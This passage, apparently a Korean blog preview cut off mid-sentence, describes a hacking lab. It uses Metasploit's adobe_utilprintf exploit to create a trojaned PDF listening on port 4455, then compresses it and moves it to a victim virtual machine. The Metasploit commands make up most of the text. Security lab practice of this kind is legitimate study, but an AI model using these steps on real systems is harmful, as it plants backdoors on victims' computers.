
프로그램 취약점 공격 실습 +keylog
·
Hacking
실제상황XX프로그램 취약점을 이용한 공격 > pdf 파일에 백도어를 설치해 트로이목마를 심어볼 예정 취약점이 있는 프로그램을 클라이언트측에 설치 msfconsole 들어가기 위 도구는 악성코드로 파일을 만들어줌. use exploit/windows/fileformat/adobe_utilprintf set filename test1.pdfset lport 4455exploit exitcd /root/.msf4 ~~ 경로로 이동 후 파일 압축하기 gzip test1.pdfmv /root/Desktop 파일이 다른 가상머신으로 옮겨지지 않는 경우 아래 설치apt -y install open-vm-tools open-vm-tools-desktop 클라이언트에 파일 옮기고 칼리에서 포트를 여는 도구를 사용한..